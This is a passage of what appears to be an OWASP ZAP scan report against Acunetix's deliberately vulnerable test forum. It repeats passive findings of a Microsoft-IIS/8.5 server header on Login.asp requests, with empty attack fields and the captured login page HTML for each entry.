href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
